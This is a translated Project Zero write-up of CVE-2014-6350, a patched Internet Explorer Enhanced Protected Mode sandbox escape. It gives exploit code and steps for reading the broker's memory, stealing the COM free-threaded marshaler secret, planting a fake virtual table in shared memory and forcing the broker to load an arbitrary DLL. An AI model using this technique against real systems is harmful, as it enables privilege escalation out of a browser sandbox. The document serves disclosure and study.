Blast, 2014/12/04 became known
0x00 Preface
By James Forshaw
Original text: Link
This month Microsoft fixed three different sandbox escapes in Internet Explorer's Enhanced Protected Mode (EPM), which I disclosed in August. Sandboxes are a major focus of Project Zero (and of mine in particular), because they sit at the critical point that determines whether an attacker can turn remote code execution into elevated privileges on the machine.
All three bugs have been fixed in MS14-065, which you can read here.
CVE-2014-6350 is perhaps the most interesting of the three, not because the bug itself is special, but because of the unusual technique needed to exploit it for anything beyond information disclosure. It is an arbitrary memory read, which opens up potential attacks against processes that host COM. This post goes into some depth on how to exploit it.
0x01 What is the vulnerability this time?
The vulnerability is caused by weak permissions on the IE broker process when running in Enhanced Protected Mode. It does not affect the old Protected Mode (PM), for reasons I'll cover later. The EPM sandbox hosts the untrusted tab processes in which web content runs. The broker process is responsible for providing privileged services to the tab processes when they need them. The tab and broker processes interact through a DCOM-based IPC mechanism.
Knowing how the Windows access check works, we can determine which permissions are granted when the broker process is opened from inside the EPM sandbox. The access check for code running in an AppContainer is slightly more complicated than the traditional Windows check. Instead of a single check, two separate checks are performed to calculate the maximum permissions the DACL can grant. The first check is the usual one against the user and group SIDs in the token, and the second is against the token's capability SIDs. The bitwise AND of the two resulting permission sets is the maximum access that can be granted (deny ACEs are ignored here because they are not relevant to this discussion).
The first access check matches the current user's SID, giving full control (marked in red), and the second check matches IE's capability SID (marked in blue). Combining the two leaves a maximum of only the "read memory" and "query information" permissions. The fact that the read memory permission is granted is the bug Microsoft fixed.
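The two-pass check described above can be sketched in portable C. This is a simplified model and not the kernel's implementation: SIDs are plain strings, only allow ACEs are considered, and the names AllowAce, granted_for, appcontainer_max_access and example_broker_max_access are hypothetical. The access-mask constants are the values from the Windows SDK headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Process access rights (values from the Windows SDK). */
#define PROCESS_VM_READ           0x0010u
#define PROCESS_QUERY_INFORMATION 0x0400u
#define PROCESS_ALL_ACCESS        0x1FFFFFu

/* One allow ACE: a SID (modelled as a string) and the rights it grants. */
typedef struct {
    const char *sid;
    uint32_t    mask;
} AllowAce;

/* Union of the rights granted by every ACE whose SID appears in `sids`. */
uint32_t granted_for(const AllowAce *dacl, size_t n_aces,
                     const char *const *sids, size_t n_sids)
{
    uint32_t granted = 0;
    assert(dacl != NULL && sids != NULL);
    for (size_t i = 0; i < n_aces; i++)
        for (size_t j = 0; j < n_sids; j++)
            if (strcmp(dacl[i].sid, sids[j]) == 0)
                granted |= dacl[i].mask;
    return granted;
}

/* AppContainer rule from the text: bitwise AND of the two passes. */
uint32_t appcontainer_max_access(const AllowAce *dacl, size_t n_aces,
                                 const char *const *user_sids, size_t n_user,
                                 const char *const *cap_sids, size_t n_cap)
{
    return granted_for(dacl, n_aces, user_sids, n_user) &
           granted_for(dacl, n_aces, cap_sids, n_cap);
}

/* Usage: a DACL shaped like the broker's, with made-up SID names. */
uint32_t example_broker_max_access(void)
{
    const AllowAce dacl[] = {
        { "current-user",  PROCESS_ALL_ACCESS },
        { "ie-capability", PROCESS_VM_READ | PROCESS_QUERY_INFORMATION },
    };
    const char *const user_sids[] = { "current-user" };
    const char *const cap_sids[]  = { "ie-capability" };
    return appcontainer_max_access(dacl, 2, user_sids, 1, cap_sids, 1);
}
```

With this DACL the user pass yields full control and the capability pass yields read memory plus query information, so the AND leaves exactly those two rights.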
We can call OpenProcess with the broker process's PID and request PROCESS_VM_READ access, and the kernel hands the sandboxed process a handle. With this handle, ReadProcessMemory can read arbitrary memory from the broker. The function also handles invalid memory reads gracefully, so nothing crashes.
#!c
BOOL ReadMem(DWORD ppid, LPVOID addr, LPVOID result, SIZE_T size)
{
    HANDLE hProcess = OpenProcess(PROCESS_VM_READ, FALSE, ppid);
    BOOL ret = FALSE;

    if (hProcess)
    {
        ret = ReadProcessMemory(hProcess, addr, result, size, NULL);
        CloseHandle(hProcess);
    }

    return ret;
}
Things get a little more complicated on 64-bit Windows when the exploit runs from a 32-bit tab process, because WOW64 gets in the way and ReadProcessMemory cannot be used directly to read the memory of the 64-bit broker. You can get around this limitation with something like wow64ext, but we'll ignore that for now.
But wait, what about PM? Why isn't it vulnerable as well? Only a single access check is performed in PM, so we should get full control, but we don't because of the Mandatory Integrity Level (IL) feature introduced in Windows Vista. When one process attempts to open another, the kernel first compares the caller's IL with the level specified in the target process's system ACL (SACL). If the caller's IL is lower than the level specified by the target process, access is limited to a small subset of the available permissions (for example PROCESS_QUERY_LIMITED_INFORMATION). This blocks PROCESS_VM_READ and anything more dangerous, regardless of what the DACL would grant.
Okay, so let's look at the token of the EPM sandboxed process in Process Explorer. We can clearly see that the token has the Low mandatory integrity level (highlighted in the figure below).
Strangely, however, the AppContainer access check appears to ignore IL, at least for any resource whose level is at or below Medium. If a resource passes the DACL check, access is granted regardless of IL. This appears to hold for any securable resource, including files and registry keys. I don't know whether this is by design, but it looks like a weakness; had the IL check also been applied here, this bug would not have been an issue.
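The difference between PM and EPM can be put into a small model. It is only a sketch of the behaviour described above: the function max_process_access, the IntegrityLevel enum and the choice to represent the "small subset" by the single right PROCESS_QUERY_LIMITED_INFORMATION are assumptions made for illustration, not the kernel's actual logic.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Process access rights (values from the Windows SDK). */
#define PROCESS_VM_READ                   0x0010u
#define PROCESS_QUERY_INFORMATION         0x0400u
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000u
#define PROCESS_ALL_ACCESS                0x1FFFFFu

/* Simplified integrity levels, ordered from low to high. */
typedef enum { IL_LOW = 1, IL_MEDIUM = 2, IL_HIGH = 3 } IntegrityLevel;

/*
 * Maximum access after the integrity check, given what the DACL granted.
 * Assumption: the limited subset is modelled as one right only.
 */
uint32_t max_process_access(uint32_t dacl_granted,
                            IntegrityLevel caller_il,
                            IntegrityLevel target_il,
                            bool caller_is_appcontainer)
{
    const uint32_t limited = PROCESS_QUERY_LIMITED_INFORMATION;
    bool il_enforced;

    assert(caller_il <= IL_HIGH && target_il <= IL_HIGH);

    /* Observed quirk: AppContainer callers skip the IL check for
       targets at or below medium integrity. */
    il_enforced = !(caller_is_appcontainer && target_il <= IL_MEDIUM);

    if (il_enforced && caller_il < target_il)
        return dacl_granted & limited;
    return dacl_granted;
}
```

For a low-integrity PM tab opening the medium-integrity broker, full control from the DACL is cut down to the limited right. For an EPM tab, the read memory and query information rights from the DACL survive untouched.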
0x02 Exploiting the Vulnerability
The original PoC, provided in the Google issue tracker (https://code.google.com/p/google-security-research/issues/detail?id=97), uses the broker's IPC interfaces to read arbitrary files on the system. By reading the per-process HMAC key, the PoC can forge a valid token and then call CShDocVwBroker::GetFileHandle to open the file. This is useful under EPM because AppContainer otherwise prevents arbitrary files from being read. But after all, this is only a read, not a write. Ideally we want to escape the sandbox completely, rather than just leak the contents of some files.
That may seem like a difficult task, but it turns out that other technologies also rely on per-process secrets for their security. One of them is my all-time favorite Windows technology, COM (just kidding). As long as we can leak the memory contents of the hosting process, there is a way to get code execution in many processes that implement remote COM services.
COM Threading Models, Apartments, and Interface Marshaling
COM is used by many Windows components, from the Explorer shell to local privileged services such as BITS. Each use case has different requirements and limitations. UI code, for example, requires everything to run on a single thread, otherwise the operating system will not be happy. A utility class, on the other hand, might be completely thread-safe. To support these requirements, COM offers a set of threading models, which takes some of the burden off the programmer.
A COM object belongs to an apartment, which defines how methods on the object can be called. There are two types of apartments: single-threaded apartments (STA) and multi-threaded apartments (MTA). When considering how these apartments interact, we need to define the relationship between caller and object. We therefore call the caller of the object's methods the "client" and the object the "server".
The client's apartment is determined by the flag passed to CoInitializeEx (the legacy CoInitialize defaults to STA). The server's apartment depends on the threading model defined for the COM object in the Windows registry. There are three possible settings: Free (multi-threaded), Apartment (single-threaded), and Both. If the client and server have compatible apartments (which only happens if the server object supports both threading models), calls on the object are direct function calls through the object's virtual function table. However, when an STA calls an MTA or an MTA calls an STA, the call has to be proxied in some way, and COM handles this through marshaling. We can sum it up in the following table.
Marshaling is the process of serializing method calls to the server object. This is especially important for an STA, where every method must be called on a single thread. That is usually achieved with a Windows message loop; if your program has no window or message loop, the STA creates one for you. When a client calls an object in an incompatible apartment, it is actually calling a special proxy object. This proxy knows about every COM interface and method, including which parameters each method takes.
The proxy takes the parameters, serializes them with the built-in COM marshaling code, and sends them to the server. On the server side, a dispatcher unmarshals the parameters and invokes the appropriate method on the server object. Any return value is sent back to the client in the same way.
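The proxy and dispatcher roles can be illustrated with a toy round trip in plain C. Nothing here is real COM: the Counter object, the 8-byte wire format and all function names are made up for the sketch, and the "transport" is simply a struct passed by value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical server object with a single method. */
typedef struct { int32_t total; } Counter;

int32_t Counter_Add(Counter *self, int32_t amount)
{
    self->total += amount;
    return self->total;
}

enum { METHOD_ADD = 1 };

/* Made-up wire format: 4-byte method id, then a 4-byte argument. */
typedef struct { uint8_t bytes[8]; } Message;

/* Client side: the proxy serializes the call instead of making it. */
Message proxy_marshal_add(int32_t amount)
{
    Message msg;
    uint32_t method = METHOD_ADD;
    memcpy(msg.bytes, &method, sizeof method);
    memcpy(msg.bytes + 4, &amount, sizeof amount);
    return msg;
}

/* Server side: the dispatcher unmarshals and invokes the real method. */
int32_t stub_dispatch(Counter *server, const Message *msg)
{
    uint32_t method;
    int32_t amount;
    assert(server != NULL && msg != NULL);
    memcpy(&method, msg->bytes, sizeof method);
    memcpy(&amount, msg->bytes + 4, sizeof amount);
    if (method != METHOD_ADD)
        return -1; /* unknown method id */
    return Counter_Add(server, amount);
}

/* Usage: two calls that go through the proxy/dispatcher pair. */
int32_t example_proxy_round_trip(void)
{
    Counter server = { 0 };
    Message first = proxy_marshal_add(5);
    Message second = proxy_marshal_add(7);
    stub_dispatch(&server, &first);
    return stub_dispatch(&server, &second);
}
```

The client never touches the Counter directly; it only produces bytes, which is why the same scheme works whether the bytes travel within a process or across a process boundary.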
It turns out that this model works just as well between processes, using DCOM, as it does within a process. The same proxy marshaling and dispatch technique can be used between processes or between computers. The only difference is the transport for the marshaled parameters: instead of in-process memory, it may be local RPC, named pipes, or even TCP, depending on where the client and server are located.
Free-threaded marshaler
Okay, so what does this have to do with leaking memory? To understand that, I need to introduce something called the Free-Threaded Marshaler (FTM), which relates to the previous table. When an STA client calls a multi-thread-capable server, it seems inefficient for the client to go through the whole proxy-marshaling process. Why can't it just call the object directly? This is the problem the FTM solves.
When a COM object is instantiated in an incompatible apartment, a reference to the object must be returned to the caller. This is marshaled in the same way as a normal call. In fact, the same mechanism applies when you call a method that takes a COM object as an argument. To pass the reference, the marshaler creates a special data stream called an OBJREF. This stream contains all the information the client needs to construct a proxy object and contact the server. It implements pass-by-reference semantics for COM objects. An example of an OBJREF is as follows:
In some scenarios, though, it makes sense to pass an object by value, for example to eliminate the proxy. In that case the OBJREF stream uses pass-by-value semantics and carries all the data needed to reconstruct the original object in the client's apartment. When the unmarshaler reconstructs the object, it creates and initializes a new copy of the original object rather than obtaining a proxy. An object can implement its own pass-by-value semantics through the IMarshal interface.
This is the feature the FTM uses to "cheat" the system. Rather than passing the original object's data, it passes a pointer to the original object in memory, serialized into the OBJREF. When unmarshaled, the pointer is deserialized and returned to the caller. It behaves like a "fake proxy" and allows calls to be made directly on the original object.
If you feel uneasy at this point, that is understandable. Since the marshaling process is much the same for in-process COM as for DCOM, doesn't this open a major security hole? Fortunately, it does not. The FTM does not just send the pointer value; it also tries to ensure that marshaled data can only be unmarshaled in the same process that marshaled it. It does this by generating a per-process 16-byte random value and appending it to the serialized data. When deserializing, the FTM checks that this value matches the one stored by the current process, and rejects the data if the two differ. The assumption is that an attacker cannot guess or brute-force the value, so the FTM will never unmarshal a pointer it did not produce itself. But this threat model does not hold when we can read arbitrary process memory, which is exactly the vulnerability we have.
The FTM is implemented by the CStaticMarshaler class in combase.dll. On Windows 7 it lives in ole32.dll instead, as the CFreeMarshaler class. The code of CStaticMarshaler::UnmarshalInterface looks roughly as follows:
#!c
HRESULT CStaticMarshaler::UnmarshalInterface(IStream* pStm,
                                             REFIID riid,
                                             void** ppv)
{
    DWORD mshlflags;
    BYTE secret[16];
    ULONGLONG pv;

    // Refuse to unmarshal until the per-process secret exists.
    if (!CStaticMarshaler::_fSecretInit)
    {
        return E_UNEXPECTED;
    }

    pStm->Read(&mshlflags, sizeof(mshlflags));
    pStm->Read(&pv, sizeof(pv));
    pStm->Read(secret, sizeof(secret));

    if (SecureCompareBuffer(secret, CStaticMarshaler::_SecretBlock))
    {
        *ppv = (void*)pv;

        if ((mshlflags == MSHLFLAGS_TABLESTRONG)
         || (mshlflags == MSHLFLAGS_TABLEWEAK))
        {
            ((IUnknown*)*ppv)->AddRef();
        }

        return S_OK;
    }
    else
    {
        return E_UNEXPECTED;
    }
}
Note that the method checks whether the secret has been initialized, which prevents an attacker from using an uninitialized secret (i.e., all zeros). Note also the use of a secure comparison function, which avoids timing attacks against the secret check. This is actually a fix that has not been backported: on Windows 7 the comparison uses the repe cmpsd instruction, which is not constant-time. So on Windows 7 a timing attack might be possible, although I expect it would take a lot of work.
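To make the timing point concrete, here is a generic sketch contrasting an early-exit comparison with a constant-time one. It is not the implementation of SecureCompareBuffer, whose internals are not shown in this post; the function names leaky_equal and constant_time_equal are hypothetical, and an aggressive compiler may still alter the timing of such code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Early exit: returns at the first mismatch, so the running time
   reveals how many leading bytes of a guess were correct. */
int leaky_equal(const uint8_t *a, const uint8_t *b, size_t len)
{
    assert(a != NULL && b != NULL);
    for (size_t i = 0; i < len; i++)
        if (a[i] != b[i])
            return 0;
    return 1;
}

/* Constant-time style: always visits every byte and accumulates the
   differences, so the loop length does not depend on the data. */
int constant_time_equal(const uint8_t *a, const uint8_t *b, size_t len)
{
    uint8_t diff = 0;
    assert(a != NULL && b != NULL);
    for (size_t i = 0; i < len; i++)
        diff |= (uint8_t)(a[i] ^ b[i]);
    return diff == 0;
}
```

Both functions return the same answers; only the second avoids leaking the position of the first mismatching byte through its running time.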
The final structure looks like this:
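As a rough sketch, the custom marshaling payload can be laid out in the order in which UnmarshalInterface reads it: a 4-byte flags field, an 8-byte pointer, and the 16-byte secret, 28 bytes in total. This covers only the payload, not the surrounding OBJREF header. The helper names ftm_pack, ftm_blob_pointer and example_pack_and_read_back are hypothetical, and the bytes are written in host byte order, which is little-endian on x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* MSHLFLAGS values from the Windows SDK. */
#define MSHLFLAGS_NORMAL      0u
#define MSHLFLAGS_TABLESTRONG 1u
#define MSHLFLAGS_TABLEWEAK   2u

#define FTM_SECRET_SIZE 16u
#define FTM_BLOB_SIZE   (4u + 8u + FTM_SECRET_SIZE) /* 28 bytes */

/* Write flags, pointer and secret in read order; returns bytes written. */
size_t ftm_pack(uint8_t out[FTM_BLOB_SIZE], uint32_t mshlflags,
                uint64_t pointer, const uint8_t secret[FTM_SECRET_SIZE])
{
    assert(out != NULL && secret != NULL);
    memcpy(out, &mshlflags, 4);                 /* offset 0  */
    memcpy(out + 4, &pointer, 8);               /* offset 4  */
    memcpy(out + 12, secret, FTM_SECRET_SIZE);  /* offset 12 */
    return FTM_BLOB_SIZE;
}

/* Read the pointer field back out of a packed blob. */
uint64_t ftm_blob_pointer(const uint8_t blob[FTM_BLOB_SIZE])
{
    uint64_t pointer;
    memcpy(&pointer, blob + 4, 8);
    return pointer;
}

/* Usage: pack a blob with a placeholder secret and read the pointer. */
uint64_t example_pack_and_read_back(void)
{
    uint8_t blob[FTM_BLOB_SIZE];
    const uint8_t secret[FTM_SECRET_SIZE] = { 0 }; /* placeholder only */
    ftm_pack(blob, MSHLFLAGS_TABLESTRONG, 0x12345678u, secret);
    return ftm_blob_pointer(blob);
}
```

The pointer field is 8 bytes wide even for a 32-bit process, matching the ULONGLONG read in the unmarshal code.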
To exploit this, we need to implement the IMarshal interface on our own COM object. In particular, we need to implement two methods: IMarshal::GetUnmarshalClass, which returns the CLSID of the COM object to use when reconstructing the object, and IMarshal::MarshalInterface, which packages the pointer values the exploit needs. Here is a simple example:
#!c
GUID CLSID_FreeThreadedMarshaller =
    { 0x0000033A, 0x0000, 0x0000,
      { 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, } };

// Tell COM to unmarshal this object with the free-threaded marshaler.
HRESULT STDMETHODCALLTYPE CFakeObject::GetUnmarshalClass(
    REFIID riid,
    void *pv,
    DWORD dwDestContext,
    void *pvDestContext,
    DWORD mshlflags,
    CLSID *pCid)
{
    memcpy(pCid, &CLSID_FreeThreadedMarshaller,
           sizeof(CLSID_FreeThreadedMarshaller));
    return S_OK;
}

// Write the fields in the order UnmarshalInterface reads them:
// flags, pointer value, then the per-process secret.
HRESULT STDMETHODCALLTYPE CFakeObject::MarshalInterface(
    IStream *pStm,
    REFIID riid,
    void *pv,
    DWORD dwDestContext,
    void *pvDestContext,
    DWORD mshlflags)
{
    pStm->Write(&_mshlflags, sizeof(_mshlflags), NULL);
    pStm->Write(&_pv, sizeof(_pv), NULL);
    pStm->Write(&_secret, sizeof(_secret), NULL);
    return S_OK;
}
That’s easy enough. Let’s see how we can use it.
0x03 Escaping the Sandbox
With that background, it's time to escape the sandbox. To get code executing in the broker process, outside the sandbox, there are three things we need to do:
- Extract the FTM per-process secret from the broker process.
- Construct a fake virtual table and a fake object pointer.
- Marshal an object into the broker process to get code executed.
Extracting the per-process secret
This should be easy. We know where the value is in memory, because combase.dll is loaded at the same address in the sandboxed process as in the broker process. Although ASLR was introduced in Vista, system DLLs are only randomized once per boot, so combase.dll is loaded at the same place in every process. This is a weakness of ASLR on Windows, especially for local privilege escalation. But there is a problem if you read the value from the broker after a normal IE start:
Unfortunately the FTM has not been initialized yet, which means there is nothing to extract. How do we get it initialized from the sandboxed process? We just need to make the broker process do more COM work, in particular something that is likely to invoke the FTM.
We can use the Open/Save dialog, which is implemented in the Explorer shell (shell32.dll) and of course uses COM. Because it is UI, it must use an STA, but it is likely to call free-threaded objects and therefore end up using the FTM. So let's try opening a dialog manually and see what happens.
Much better. The practical reason for choosing this dialog is that we can launch it from the sandboxed process with the IEShowSaveFileDialog API (which is actually implemented through several broker calls). Obviously this displays some UI, but that doesn't matter: by the time the dialog is displayed, the FTM is already initialized, and there is nothing the user can do about it.
For now we can simply hardcode the offsets into combase.dll. Of course, you could also find them dynamically by initializing the FTM in the sandboxed process and locating the secret through a memory search.
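The address arithmetic behind this step is small enough to sketch. Because the DLL base is the same in both processes, the address to read in the broker is the local module base plus a build-specific offset. The function names below are hypothetical, no real offset is given here, and treating an all-zero buffer as "not initialized yet" is an assumption for illustration (the unmarshal code itself consults a separate _fSecretInit flag).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FTM_SECRET_SIZE 16u

/* Same module base in every process, so the remote address is simply
   the local base plus the offset of the secret within the DLL. */
uintptr_t secret_address_in_broker(uintptr_t local_combase_base,
                                   uintptr_t secret_offset)
{
    assert(local_combase_base != 0);
    return local_combase_base + secret_offset;
}

/* Assumption: an all-zero buffer means the FTM has not run yet. */
int secret_looks_initialized(const uint8_t secret[FTM_SECRET_SIZE])
{
    uint8_t acc = 0;
    assert(secret != NULL);
    for (size_t i = 0; i < FTM_SECRET_SIZE; i++)
        acc |= secret[i];
    return acc != 0;
}

/* Usage: a freshly zeroed buffer is reported as uninitialized. */
int example_zero_secret_is_uninitialized(void)
{
    const uint8_t zeros[FTM_SECRET_SIZE] = { 0 };
    return !secret_looks_initialized(zeros);
}
```

In the exploit, the buffer passed to the check would be the 16 bytes read from the computed address with the ReadMem helper shown earlier.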
Build a fake virtual table
The next challenge is to get our fake virtual table into the broker process. Since we can read the broker's memory, we could certainly use one of the broker's APIs for something like heap flooding, but is there an easier way? The IE broker and the sandboxed process share memory sections that they use to pass settings and information. Some of these sections are writable by the sandboxed process, so all we need to do is find the corresponding mapping in the broker process and modify our copy to contain whatever we want. In this example, the section \Sessions\X\BaseNamedObjects\URLZones_user is used (X is the session ID, user is the user name). It is mapped into the broker process and writable from the sandboxed process, but we still need to find where it is mapped.
We don't need to brute-force the location of this section. We can open the process with PROCESS_QUERY_INFORMATION access and use VirtualQueryEx to enumerate the mapped memory regions; because it returns each region's size, we can quickly skip unmapped areas. We then look for a canary value that we wrote into the section to determine the right address.
#!c
DWORD_PTR FindSharedSection(LPBYTE section, HANDLE hProcess)
{
    // No point starting at lowest value
    LPBYTE curr = (LPBYTE)0x10000;
    LPBYTE max = (LPBYTE)0x7FFF0000;

    memcpy(&section[0], "ABCD", 4);

    while (curr < max)
    {
        MEMORY_BASIC_INFORMATION basicInfo = { 0 };

        if (VirtualQueryEx(hProcess, curr, &basicInfo, sizeof(basicInfo)))
        {
            if ((basicInfo.State == MEM_COMMIT)
             && (basicInfo.Type == MEM_MAPPED)
             && (basicInfo.RegionSize == 4096))
            {
                CHAR buf[4] = { 0 };
                SIZE_T read_len = 0;

                ReadProcessMemory(hProcess, (LPBYTE)basicInfo.BaseAddress,
                                  buf, 4, &read_len);

                if (memcmp(buf, "ABCD", 4) == 0)
                {
                    return (DWORD_PTR)basicInfo.BaseAddress;
                }
            }

            curr = (LPBYTE)basicInfo.BaseAddress + basicInfo.RegionSize;
        }
        else
        {
            break;
        }
    }

    return 0;
}
Once we have found the shared memory section, we need to build our virtual table and fake object in it. What should the virtual table call? You might think this is the time for a ROP chain, but we don't need one. Since all COM calls use the stdcall convention, with all arguments on the stack, we can call almost any function for which we only need control of the first argument, which is our this pointer.
One way to exploit this is to call a function such as LoadLibraryW and build the fake object so that it forms a relative path to a DLL we want loaded. As long as the virtual table pointer contains no NUL characters (which makes this approach difficult on 64-bit systems), we can cancel it out of the path and have the library loaded. We can ensure this by setting the lower 16 bits to an arbitrary value; the upper 16 bits are out of our control, but they will almost never be zero, because Windows' NULL page protection prevents allocations below the 64 KB mark. In the end, our fake object looks something like:
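The layout just described can be sketched for the 32-bit case as a byte buffer: a 4-byte virtual table pointer followed directly by a UTF-16 path, so that the whole object doubles as a wide string. The helpers vtable_ptr_is_path_safe and build_fake_object are hypothetical, the sketch only accepts ASCII paths, and the example path is a placeholder rather than the one used in the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read as UTF-16, a 32-bit pointer is two 16-bit characters.
   Neither half may be zero, or the string would end early. */
int vtable_ptr_is_path_safe(uint32_t vtable_ptr)
{
    uint16_t low  = (uint16_t)(vtable_ptr & 0xFFFFu);
    uint16_t high = (uint16_t)(vtable_ptr >> 16);
    return low != 0 && high != 0;
}

/*
 * Write the pointer (little-endian) followed by the path widened to
 * UTF-16LE with its terminator. Returns the number of bytes written,
 * or 0 if the pointer is unsafe or the buffer is too small.
 */
size_t build_fake_object(uint8_t *out, size_t out_size,
                         uint32_t vtable_ptr, const char *ascii_path)
{
    size_t len, needed;
    assert(out != NULL && ascii_path != NULL);

    len = strlen(ascii_path);
    needed = 4 + (len + 1) * 2;
    if (!vtable_ptr_is_path_safe(vtable_ptr) || needed > out_size)
        return 0;

    for (size_t i = 0; i < 4; i++)
        out[i] = (uint8_t)(vtable_ptr >> (8 * i));
    for (size_t i = 0; i <= len; i++) {   /* includes the terminator */
        out[4 + 2 * i] = (uint8_t)ascii_path[i];
        out[5 + 2 * i] = 0;
    }
    return needed;
}

/* Usage: 4 pointer bytes plus six UTF-16 units ("a.dll" and NUL). */
size_t example_fake_object_size(void)
{
    uint8_t buffer[64];
    return build_fake_object(buffer, sizeof buffer, 0x12345678u, "a.dll");
}
```

The virtual table that the pointer refers to would sit elsewhere in the same shared section, with its slots set to the address of the function to call.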
Of course, if you look at the definition of the IUnknown interface, only AddRef and Release in this object's virtual table have the right signature. If the broker process calls QueryInterface on the object, the signature is completely wrong. On 64-bit systems this is harmless because of the way parameters are passed, but on a 32-bit system it leaves the stack misaligned, which is not ideal. Still, it doesn't really matter: it could be fixed if it were a problem, or we could simply call ExitProcess in the broker process. Better yet, if we choose a suitable method for injecting the object, QueryInterface may never be called at all and the problem doesn't arise. That is what we are going to do.
Marshaling an object into the broker process
This turns out to be the easy part. Because all the broker interfaces used from the sandbox are COM interfaces, all we need to do is find a method that takes an IUnknown pointer and pass it our fake marshaling object. For this purpose I found the IEBrokerAttach interface, which can be queried from the Shell Document View broker and has a single function with the following prototype:
HRESULT AttachIEFrameToBroker(IUnknown* pFrame);
Even better, the frame has already been set up before our exploit gets control, so calling this method fails immediately without touching the pFrame object. We therefore don't have to worry about QueryInterface being called. Our exploit code runs before the function is even called, so we don't really care.
So, we call this method and pass it our fake object. This causes COM to marshal our data into an OBJREF, which ends up at the other end of the IPC channel, where COM unmarshals it. That calls the FTM's UnmarshalInterface method, and since we have successfully obtained the secret value, it happily unpacks our fake object pointer. Finally, the method calls AddRef on the object, because we set the passed mshlflags to MSHLFLAGS_TABLESTRONG. This executes LoadLibraryW with our fake object as its path argument, which loads an arbitrary DLL into the broker process. All that's left is to pop calc, and the job is done.
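The final step can be simulated in portable C to show why the AddRef call hands control to a function of our choosing with the object itself as its first argument. Everything below is a stand-in: fake_load_library merely records its argument instead of loading anything, the virtual table slots use a simplified signature, and unmarshal_pointer models only the tail of the unmarshal routine shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* MSHLFLAGS values from the Windows SDK. */
#define MSHLFLAGS_NORMAL      0u
#define MSHLFLAGS_TABLESTRONG 1u
#define MSHLFLAGS_TABLEWEAK   2u

/* IUnknown-shaped table with simplified slot signatures. */
typedef struct FakeVtbl {
    unsigned long (*QueryInterface)(void *self);
    unsigned long (*AddRef)(void *self);
    unsigned long (*Release)(void *self);
} FakeVtbl;

typedef struct FakeObject {
    const FakeVtbl *vtbl;  /* first field, as in any COM object */
    char path[32];         /* data that follows the table pointer */
} FakeObject;

/* Stand-in for LoadLibraryW: remembers what it was called with. */
static const void *g_last_loaded;

unsigned long fake_load_library(void *path)
{
    g_last_loaded = path;
    return 1;
}

/* Tail of the unmarshal routine: AddRef only for table marshaling. */
void *unmarshal_pointer(void *pv, uint32_t mshlflags)
{
    assert(pv != NULL);
    if (mshlflags == MSHLFLAGS_TABLESTRONG ||
        mshlflags == MSHLFLAGS_TABLEWEAK) {
        FakeObject *obj = (FakeObject *)pv;
        obj->vtbl->AddRef(obj);  /* "this" becomes the first argument */
    }
    return pv;
}

/* Usage: returns 1 if the stand-in was called with the fake object. */
int example_addref_hits_target(uint32_t mshlflags)
{
    static const FakeVtbl vtbl = {
        fake_load_library, fake_load_library, fake_load_library
    };
    FakeObject obj = { &vtbl, "payload.dll" };

    g_last_loaded = NULL;
    unmarshal_pointer(&obj, mshlflags);
    return g_last_loaded == (const void *)&obj;
}
```

With MSHLFLAGS_NORMAL the table is never touched, which is why the exploit chooses MSHLFLAGS_TABLESTRONG.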
Finally, the real function is called, but it immediately returns an error. A nice, clean sandbox escape, although it takes a lot of supporting code.
0x04 Wrapping Up
I have added a new PoC to the original issue (https://code.google.com/p/google-security-research/issues/detail?id=97). It escapes the sandbox on 32-bit Windows 8.1 (obviously without the MS14-065 patch applied). It does not work directly on 64-bit Windows 8.1, because the broker process is 64-bit even though the tab processes may still be 32-bit. Getting it to work on 64-bit takes more creativity, but since you can control RIP, it is not too difficult. If you want to experiment on an up-to-date machine, the PoC also contains a tool, SetProcessDACL, which modifies a process's DACL to add back read permission for the IE capability SID.
Hopefully this gives you some ideas for exploiting similar bugs. Also, don't blame COM, because it is not at fault here. This is just an example of how a relatively harmless arbitrary memory read can break through layers of defense and lead to arbitrary code execution and elevation of privilege.